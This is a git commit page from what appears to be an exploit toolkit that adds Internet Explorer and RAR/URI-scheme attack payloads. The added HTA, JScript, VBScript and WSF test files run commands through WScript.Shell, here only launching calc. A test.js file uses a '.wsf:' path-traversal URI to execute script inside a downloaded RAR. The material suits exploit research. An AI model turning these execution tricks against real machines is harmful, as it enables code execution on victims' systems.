Added CAB-based IE-only attacks, and CAB-less attacks via hybrid RAR and additional URI schemes

2025-05-09 20:13:31 +01:00 · 2021-09-24 17:43:18 +01:00 · 2021-09-24 17:43:18 +01:00 · a0d1b8d4c4
commit a0d1b8d4c4
parent 31415dbf4e
27 changed files with 1376 additions and 55 deletions
--- a/test/calc.dll
+++ b/test/calc.dll
--- a/test/calc.hta
+++ b/test/calc.hta
@ -0,0 +1,11 @@
+<script language="VBScript">
+  Function Calc()
+    Dim wsh
+    Set wsh = CreateObject("Wscript.Shell")
+    wsh.run "cmd /c calc.exe"
+    Set wsh = Nothing
+  End Function
+
+  Calc
+  self.close
+</script>
--- a/test/calc.js
+++ b/test/calc.js
@ -0,0 +1,6 @@
+function calc(){
+    var x = new ActiveXObject("WScript.shell");
+    x.Run("cmd /c calc");
+}
+
+calc();
--- a/test/calc.vbs
+++ b/test/calc.vbs
@ -0,0 +1,8 @@
+Function Calc()
+    Dim wsh
+    Set wsh = CreateObject("Wscript.Shell")
+    wsh.run "cmd /c calc.exe"
+    Set wsh = Nothing
+End Function
+
+Calc
--- a/test/job-jscript.wsf
+++ b/test/job-jscript.wsf
@ -0,0 +1 @@
+<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job>
--- a/test/job-vbs.wsf
+++ b/test/job-vbs.wsf
@ -0,0 +1 @@
+<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job>
--- a/test/test.js
+++ b/test/test.js
@ -0,0 +1,2 @@
+var o = new ActiveXObject('htmlfile').Script.location='.wsf:../../../../../Users/d3adc0de.PCOIPTEST/Downloads/YK2TLVILEHG2.rar?.wsf';
+WScript.Echo(o);
				`@ -0,0 +1 @@`
				`<job><script language="JScript">var x = new ActiveXObject("WScript.shell");x.Run("cmd /c calc");</script></job>`
				`@ -0,0 +1 @@`
				`<job id="VBScriptJob"><script language="VBScript">CreateObject("WScript.Shell").Run "cmd /c calc"</script></job>`